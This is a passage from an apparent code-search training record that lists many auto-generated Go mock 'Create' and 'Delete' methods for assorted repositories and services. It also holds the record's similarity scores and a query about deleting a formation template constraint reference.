*MockStub) Create(enclaveLibFile string) error {\n\treturn nil\n}", "func (m *MockStub) Create(enclaveLibFile string) error {\n\treturn nil\n}", "func makeTestRepo() *TestRepo {\n\ttestRepo := &TestRepo{\n\t\tArgsIn: make(map[string][]interface{}),\n\t\tArgsOut: make(map[string][]interface{}),\n\t\tSpecialFuncs: make(map[string]interface{}),\n\t}\n\ttestRepo.ArgsIn[GetUserByExternalIDMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[AddUserMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[UpdateUserMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetUsersFilteredMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetGroupsByUserIDMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[RemoveUserMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetGroupByNameMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[IsMemberOfGroupMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[GetGroupMembersMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[IsAttachedToGroupMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[GetAttachedPoliciesMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[GetGroupsFilteredMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[RemoveGroupMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[AddGroupMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[AddMemberMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[RemoveMemberMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[UpdateGroupMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[AttachPolicyMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[DetachPolicyMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[GetPolicyByNameMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[AddPolicyMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[UpdatePolicyMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[RemovePolicyMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetPoliciesFilteredMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetAttachedGroupsMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[OrderByValidColumnsMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetProxyResourcesMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[RemoveProxyResourceMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[AddProxyResourceMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[UpdateProxyResourceMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetProxyResourceByNameMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsIn[AddOidcProviderMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetOidcProviderByNameMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[GetOidcProvidersFilteredMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[UpdateOidcProviderMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsIn[RemoveOidcProviderMethod] = make([]interface{}, 1)\n\n\ttestRepo.ArgsOut[GetUserByExternalIDMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[AddUserMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[UpdateUserMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[GetUsersFilteredMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[GetGroupsByUserIDMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[RemoveUserMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[GetGroupByNameMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[IsMemberOfGroupMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[GetGroupMembersMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[IsAttachedToGroupMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[GetAttachedPoliciesMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[GetGroupsFilteredMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[RemoveGroupMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[AddGroupMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[AddMemberMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[RemoveMemberMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[UpdateGroupMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[AttachPolicyMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[DetachPolicyMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[GetPolicyByNameMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[AddPolicyMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[UpdatePolicyMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[RemovePolicyMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[GetPoliciesFilteredMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[GetAttachedGroupsMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[OrderByValidColumnsMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[GetProxyResourcesMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[RemoveProxyResourceMethod] = make([]interface{}, 1)\n\ttestRepo.ArgsOut[AddProxyResourceMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[UpdateProxyResourceMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[GetProxyResourceByNameMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[AddOidcProviderMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[GetOidcProviderByNameMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[GetOidcProvidersFilteredMethod] = make([]interface{}, 3)\n\ttestRepo.ArgsOut[UpdateOidcProviderMethod] = make([]interface{}, 2)\n\ttestRepo.ArgsOut[RemoveOidcProviderMethod] = make([]interface{}, 1)\n\n\treturn testRepo\n}", "func (_m *KeyManager) CreateKey(ctx context.Context, metaData base.CreateKeyMetadata) (*base.KeyMetadata, error) {\n\tret := _m.Called(ctx, metaData)\n\n\tvar r0 *base.KeyMetadata\n\tif rf, ok := ret.Get(0).(func(context.Context, base.CreateKeyMetadata) *base.KeyMetadata); ok {\n\t\tr0 = rf(ctx, metaData)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*base.KeyMetadata)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, base.CreateKeyMetadata) error); ok {\n\t\tr1 = rf(ctx, metaData)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (t *SimpleChaincode) create(stub shim.ChaincodeStubInterface, args []string) pb.Response {\n\t// must be an invoke\n\tvar X string // Entity\n\tvar Xval int // Asset holding\n\tvar err error\n\n\tif len(args) != 3 {\n\t\treturn shim.Error(\"Incorrect number of arguments. Expecting 3, function followed by 1 name and 1 value\")\n\t}\n\n\tX = args[1]\n\tXval, err = strconv.Atoi(args[2])\n\n\tif err != nil {\n\t\treturn shim.Error(\"Expecting integer value for asset holding\")\n\t}\n\tfmt.Printf(\"X = %d, Xval = %d\\n\", X, Xval)\n\n\t// Write the state to the ledger\n\terr = stub.PutState(X, []byte(strconv.Itoa(Xval)))\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\n\treturn shim.Success(nil)\n}", "func (_m *MockGroupProvider) Create(createdBy int64, name string, description *ntypes.String) (*GroupEntity, error) {\n\tret := _m.Called(createdBy, name, description)\n\n\tvar r0 *GroupEntity\n\tif rf, ok := ret.Get(0).(func(int64, string, *ntypes.String) *GroupEntity); ok {\n\t\tr0 = rf(createdBy, name, description)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*GroupEntity)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(int64, string, *ntypes.String) error); ok {\n\t\tr1 = rf(createdBy, name, description)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (m *Mockpersistent) Create(arg0 proto.Message) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", arg0)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func NewMock(t *testing.T) *MockT { return &MockT{t: t} }", "func (m *MockInternalClient) WRingCreate(ctx context.Context, in *WRingRequestMsg, opts ...grpc.CallOption) (*WRingResponseMsg, error) {\n\tvarargs := []interface{}{ctx, in}\n\tfor _, a := range opts {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"WRingCreate\", varargs...)\n\tret0, _ := ret[0].(*WRingResponseMsg)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *MockUserRepositoryProvider) Create(user *model.User) (int, error) {\n\tret := _m.Called(user)\n\n\tvar r0 int\n\tif rf, ok := ret.Get(0).(func(*model.User) int); ok {\n\t\tr0 = rf(user)\n\t} else {\n\t\tr0 = ret.Get(0).(int)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(*model.User) error); ok {\n\t\tr1 = rf(user)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (mmCreate *mPaymentRepositoryMockCreate) Inspect(f func(ctx context.Context, from int64, to int64, amount int64)) *mPaymentRepositoryMockCreate {\n\tif mmCreate.mock.inspectFuncCreate != nil {\n\t\tmmCreate.mock.t.Fatalf(\"Inspect function is already set for PaymentRepositoryMock.Create\")\n\t}\n\n\tmmCreate.mock.inspectFuncCreate = f\n\n\treturn mmCreate\n}", "func (_m *StoryRepo) Create(newStory *entity.Story) error {\n\tret := _m.Called(newStory)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(*entity.Story) error); ok {\n\t\tr0 = rf(newStory)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockUseCase) Create(key string, value interface{}) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", key, value)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *DatabaseReaderWriter) CreateTodo(ctx context.Context, todo entity.Todo) error {\n\tret := _m.Called(ctx, todo)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, entity.Todo) error); ok {\n\t\tr0 = rf(ctx, todo)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockrepoProvider) Create(ctx context.Context, user *types.User) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", ctx, user)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (m *MockIUsecase) Create(input *models.InputComment, userId uint) (uint, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", input, userId)\n\tret0, _ := ret[0].(uint)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *MockRepository) CreateSuppression(ctx context.Context, suppression optout.OptOutRecord) error {\n\tret := _m.Called(ctx, suppression)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, optout.OptOutRecord) error); ok {\n\t\tr0 = rf(ctx, suppression)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockManager) Create(ctx context.Context, user *model.User) (string, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", ctx, user)\n\tret0, _ := ret[0].(string)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func MockCreateChain(cid string) error {\n\tvar ledger ledger.PeerLedger\n\tvar err error\n\n\tif ledger = GetLedger(cid); ledger == nil {\n\t\tgb, _ := configtxtest.MakeGenesisBlock(cid)\n\t\tif ledger, err = ledgermgmt.CreateLedger(gb); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tchains.Lock()\n\tdefer chains.Unlock()\n\n\tchains.list[cid] = &chain{\n\t\tcs: &chainSupport{\n\t\t\tResources: &mockchannelconfig.Resources{\n\t\t\t\tPolicyManagerVal: &mockpolicies.Manager{\n\t\t\t\t\tPolicy: &mockpolicies.Policy{},\n\t\t\t\t},\n\t\t\t\tConfigtxValidatorVal: &mockconfigtx.Validator{},\n\t\t\t\tApplicationConfigVal: &mockchannelconfig.MockApplication{CapabilitiesRv: &mockchannelconfig.MockApplicationCapabilities{}},\n\t\t\t},\n\n\t\t\tledger: ledger,\n\t\t},\n\t}\n\n\treturn nil\n}", "func (_m *MutationResolver) CreateList(ctx context.Context, data gqlgen.ListInput) (*pg.List, error) {\n\tret := _m.Called(ctx, data)\n\n\tvar r0 *pg.List\n\tif rf, ok := ret.Get(0).(func(context.Context, gqlgen.ListInput) *pg.List); ok {\n\t\tr0 = rf(ctx, data)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*pg.List)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, gqlgen.ListInput) error); ok {\n\t\tr1 = rf(ctx, data)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (m *MockFeiraStore) Create(ctx context.Context, feira model.FeiraRequest) (string, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", ctx, feira)\n\tret0, _ := ret[0].(string)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (mock *RepositoryMock) CreateCalls() []struct {\n\tCtx context.Context\n\tName string\n} {\n\tvar calls []struct {\n\t\tCtx context.Context\n\t\tName string\n\t}\n\tlockRepositoryMockCreate.RLock()\n\tcalls = mock.calls.Create\n\tlockRepositoryMockCreate.RUnlock()\n\treturn calls\n}", "func (m *MockWriter) Create(key string, value interface{}) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", key, value)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *Repository) Create(_a0 *entities.User) (uint, error) {\n\tret := _m.Called(_a0)\n\n\tvar r0 uint\n\tif rf, ok := ret.Get(0).(func(*entities.User) uint); ok {\n\t\tr0 = rf(_a0)\n\t} else {\n\t\tr0 = ret.Get(0).(uint)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(*entities.User) error); ok {\n\t\tr1 = rf(_a0)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *MockUserProvider) Create(username string, password []byte, FirstName string, LastName string, confirmationToken []byte, isSuperuser bool, IsStaff bool, isActive bool, isConfirmed bool) (*UserEntity, error) {\n\tret := _m.Called(username, password, FirstName, LastName, confirmationToken, isSuperuser, IsStaff, isActive, isConfirmed)\n\n\tvar r0 *UserEntity\n\tif rf, ok := ret.Get(0).(func(string, []byte, string, string, []byte, bool, bool, bool, bool) *UserEntity); ok {\n\t\tr0 = rf(username, password, FirstName, LastName, confirmationToken, isSuperuser, IsStaff, isActive, isConfirmed)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*UserEntity)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(string, []byte, string, string, []byte, bool, bool, bool, bool) error); ok {\n\t\tr1 = rf(username, password, FirstName, LastName, confirmationToken, isSuperuser, IsStaff, isActive, isConfirmed)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *KeysService) Create(kcr *godo.KeyCreateRequest) (*do.SSHKey, error) {\n\tret := _m.Called(kcr)\n\n\tvar r0 *do.SSHKey\n\tif rf, ok := ret.Get(0).(func(*godo.KeyCreateRequest) *do.SSHKey); ok {\n\t\tr0 = rf(kcr)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*do.SSHKey)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(*godo.KeyCreateRequest) error); ok {\n\t\tr1 = rf(kcr)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *Usecase) CreateItem(_a0 context.Context, _a1 *request.ItemRequest) error {\n\tret := _m.Called(_a0, _a1)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, *request.ItemRequest) error); ok {\n\t\tr0 = rf(_a0, _a1)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (mock *GitModuleClientMock) CreateCalls() []struct {\n\tIn1 *v1a.GitModule\n} {\n\tvar calls []struct {\n\t\tIn1 *v1a.GitModule\n\t}\n\tlockGitModuleClientMockCreate.RLock()\n\tcalls = mock.calls.Create\n\tlockGitModuleClientMockCreate.RUnlock()\n\treturn calls\n}", "func mockOlt() *fields {\n\tdh := newMockDeviceHandler()\n\tnewOlt := &fields{}\n\tnewOlt.deviceHandlers = map[string]*DeviceHandler{}\n\tnewOlt.deviceHandlers[dh.device.Id] = dh\n\treturn newOlt\n}", "func (_m *FileRepository) Create(data *models.File) (*models.File, error) {\n\tret := _m.Called(data)\n\n\tvar r0 *models.File\n\tif rf, ok := ret.Get(0).(func(*models.File) *models.File); ok {\n\t\tr0 = rf(data)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*models.File)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(*models.File) error); ok {\n\t\tr1 = rf(data)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (mock *RequestsServiceMock) CreateCalls() []struct {\n\tCtx context.Context\n\tR *requests.Request\n} {\n\tvar calls []struct {\n\t\tCtx context.Context\n\t\tR *requests.Request\n\t}\n\tlockRequestsServiceMockCreate.RLock()\n\tcalls = mock.calls.Create\n\tlockRequestsServiceMockCreate.RUnlock()\n\treturn calls\n}", "func (m *MockResponseFactory) Create(arg0 []byte) (logic.Response, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", arg0)\n\tret0, _ := ret[0].(logic.Response)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (b *MockPrBuilder) Create() *PrMock {\n\tfor _, mock := range b.mockCreators {\n\t\tmock(b)\n\t}\n\tgomega.Expect(b.errors).To(gomega.BeEmpty())\n\n\treturn &PrMock{PullRequest: b.pullRequest}\n}", "func (m *MockTransactionApi) Create(version, locktime uint32, txinList *[]types.InputTxIn, txoutList *[]types.InputTxOut) (*types.Transaction, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", version, locktime, txinList, txoutList)\n\tret0, _ := ret[0].(*types.Transaction)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *DomainRepository) Create(ctx context.Context, domain shipping_details.Domain) (shipping_details.Domain, error) {\n\tret := _m.Called(ctx, domain)\n\n\tvar r0 shipping_details.Domain\n\tif rf, ok := ret.Get(0).(func(context.Context, shipping_details.Domain) shipping_details.Domain); ok {\n\t\tr0 = rf(ctx, domain)\n\t} else {\n\t\tr0 = ret.Get(0).(shipping_details.Domain)\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, shipping_details.Domain) error); ok {\n\t\tr1 = rf(ctx, domain)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *MockKubernetes) CreateResource(ctx context.Context, spec interface{}) error {\n\tret := _m.Called(ctx, spec)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, interface{}) error); ok {\n\t\tr0 = rf(ctx, spec)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func newReq(t *testing.T, method, path string, payload interface{}) *http.Request {\n\tt.Helper()\n\n\tvar body io.Reader\n\n\tif payload != nil {\n\t\traw, err := json.Marshal(payload)\n\t\trequire.NoError(t, err)\n\n\t\tbody = bytes.NewReader(raw)\n\t}\n\n\treturn httptest.NewRequest(method, path, body)\n}", "func (_m *OrderRepository) Create(order *domain.Order) (*domain.Order, error) {\n\tret := _m.Called(order)\n\n\tvar r0 *domain.Order\n\tif rf, ok := ret.Get(0).(func(*domain.Order) *domain.Order); ok {\n\t\tr0 = rf(order)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*domain.Order)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(*domain.Order) error); ok {\n\t\tr1 = rf(order)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *ApplicationServiceInterface) Create(_a0 *models.Application) error {\n\tret := _m.Called(_a0)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(*models.Application) error); ok {\n\t\tr0 = rf(_a0)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *FileSystem) Create(name string) (*os.File, error) {\n\tret := _m.Called(name)\n\n\tvar r0 *os.File\n\tif rf, ok := ret.Get(0).(func(string) *os.File); ok {\n\t\tr0 = rf(name)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*os.File)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(string) error); ok {\n\t\tr1 = rf(name)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (_m *Manager) Create(ctx context.Context, secret *v1.Secret, options metav1.CreateOptions) (*v1.Secret, error) {\n\tret := _m.Called(ctx, secret, options)\n\n\tvar r0 *v1.Secret\n\tif rf, ok := ret.Get(0).(func(context.Context, *v1.Secret, metav1.CreateOptions) *v1.Secret); ok {\n\t\tr0 = rf(ctx, secret, options)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*v1.Secret)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, *v1.Secret, metav1.CreateOptions) error); ok {\n\t\tr1 = rf(ctx, secret, options)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func newHandler(t interface {\n\tmock.TestingT\n\tCleanup(func())\n}) *handler {\n\tmock := &handler{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func (mock *GitModuleControllerMock) CreateCalls() []struct {\n\tIn1 *v1a.GitModule\n} {\n\tvar calls []struct {\n\t\tIn1 *v1a.GitModule\n\t}\n\tlockGitModuleControllerMockCreate.RLock()\n\tcalls = mock.calls.Create\n\tlockGitModuleControllerMockCreate.RUnlock()\n\treturn calls\n}", "func (m *MockServer) Create(quotationId uint64, params *transaction.CreateParams) (*transaction.Model, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Create\", quotationId, params)\n\tret0, _ := ret[0].(*transaction.Model)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *Storage) CreateVeiculo(nome string, marca string, ano int, modelo int) error {\n\tret := _m.Called(nome, marca, ano, modelo)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string, string, int, int) error); ok {\n\t\tr0 = rf(nome, marca, ano, modelo)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}" ]
[ "0.6506049", "0.63336253", "0.6049436", "0.6022087", "0.6017729", "0.59983265", "0.59662163", "0.59630024", "0.59338665", "0.5871227", "0.58698124", "0.58649105", "0.5860727", "0.5797569", "0.5788492", "0.5760916", "0.5745492", "0.5740569", "0.5738385", "0.5718003", "0.5712885", "0.5710549", "0.57090783", "0.57086384", "0.5705812", "0.57052076", "0.5693327", "0.56909597", "0.5661361", "0.5660081", "0.56431586", "0.56339294", "0.56228113", "0.5616746", "0.5601289", "0.55789983", "0.5574884", "0.5558826", "0.5551", "0.5549386", "0.5547235", "0.55302423", "0.5529304", "0.55269736", "0.5524457", "0.5524066", "0.55074036", "0.54993653", "0.54946995", "0.54829127", "0.54770577", "0.54528517", "0.5448752", "0.5439875", "0.5437866", "0.5435826", "0.5435826", "0.54356474", "0.5430141", "0.54272985", "0.54271346", "0.542504", "0.5424719", "0.541906", "0.54112804", "0.5407785", "0.5407598", "0.54010904", "0.5390414", "0.5386958", "0.53858113", "0.53814936", "0.53772914", "0.5361345", "0.53590775", "0.5357032", "0.53566515", "0.53453815", "0.53440684", "0.5342828", "0.53355074", "0.53266156", "0.5318632", "0.5313119", "0.5307244", "0.5303422", "0.5293368", "0.5292476", "0.5279481", "0.5278205", "0.5276488", "0.526813", "0.52673745", "0.5264549", "0.52600616", "0.5252914", "0.5251266", "0.5247316", "0.524477", "0.52393925" ]
0.5913062
9
Delete provides a mock function with given fields: ctx, constraintID, formationTemplateID
func (_m *ConstraintReferenceService) Delete(ctx context.Context, constraintID string, formationTemplateID string) error { ret := _m.Called(ctx, constraintID, formationTemplateID) var r0 error if rf, ok := ret.Get(0).(func(context.Context, string, string) error); ok { r0 = rf(ctx, constraintID, formationTemplateID) } else { r0 = ret.Error(0) } return r0 }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (s *service) Delete(ctx context.Context, constraintID, formationTemplateID string) error {\n\tif err := s.repo.Delete(ctx, formationTemplateID, constraintID); err != nil {\n\t\treturn errors.Wrapf(err, \"while deleting Formation Template Constraint Reference for Constraint with ID %q and Formation Template with ID %q\", constraintID, formationTemplateID)\n\t}\n\n\treturn nil\n}", "func (_m *Manager) Delete(ctx context.Context, projectID int64, meta ...string) error {\n\t_va := make([]interface{}, len(meta))\n\tfor _i := range meta {\n\t\t_va[_i] = meta[_i]\n\t}\n\tvar _ca []interface{}\n\t_ca = append(_ca, ctx, projectID)\n\t_ca = append(_ca, _va...)\n\tret := _m.Called(_ca...)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, int64, ...string) error); ok {\n\t\tr0 = rf(ctx, projectID, meta...)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func DeleteTemplateMocked(t *testing.T, templateIn *types.Template) {\n\n\tassert := assert.New(t)\n\n\t// wire up\n\tcs := &utils.MockConcertoService{}\n\tds, err := NewTemplateService(cs)\n\tassert.Nil(err, \"Couldn't load template service\")\n\tassert.NotNil(ds, \"Template service not instanced\")\n\n\t// to json\n\tdIn, err := json.Marshal(templateIn)\n\tassert.Nil(err, \"Template test data corrupted\")\n\n\t// call service\n\tcs.On(\"Delete\", fmt.Sprintf(\"/blueprint/templates/%s\", templateIn.ID)).Return(dIn, 200, nil)\n\terr = ds.DeleteTemplate(templateIn.ID)\n\tassert.Nil(err, \"Error deleting template\")\n\n}", "func (_m *BundleRepository) Delete(ctx context.Context, tenant string, id string) error {\n\tret := _m.Called(ctx, tenant, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, string) error); ok {\n\t\tr0 = rf(ctx, tenant, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *DBClient) DeleteTransmission(age int64, status models.TransmissionStatus) error {\n\tret := _m.Called(age, status)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(int64, models.TransmissionStatus) error); ok {\n\t\tr0 = rf(age, status)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Usecase) Delete(ctx context.Context, id int, pocketId int) error {\n\tret := _m.Called(ctx, id, pocketId)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, int, int) error); ok {\n\t\tr0 = rf(ctx, id, pocketId)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *SecretStorage) Delete(id models.Id, projectId models.Id) error {\n\tret := _m.Called(id, projectId)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(models.Id, models.Id) error); ok {\n\t\tr0 = rf(id, projectId)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *ISession) GuildTemplateDelete(guildID string, templateCode string, options ...discordgo.RequestOption) error {\n\t_va := make([]interface{}, len(options))\n\tfor _i := range options {\n\t\t_va[_i] = options[_i]\n\t}\n\tvar _ca []interface{}\n\t_ca = append(_ca, guildID, templateCode)\n\t_ca = append(_ca, _va...)\n\tret := _m.Called(_ca...)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string, string, ...discordgo.RequestOption) error); ok {\n\t\tr0 = rf(guildID, templateCode, options...)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Client) DeleteTemplate(_a0 context.Context, _a1 build.DeleteTemplateArgs) error {\n\tret := _m.Called(_a0, _a1)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, build.DeleteTemplateArgs) error); ok {\n\t\tr0 = rf(_a0, _a1)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *SecretService) 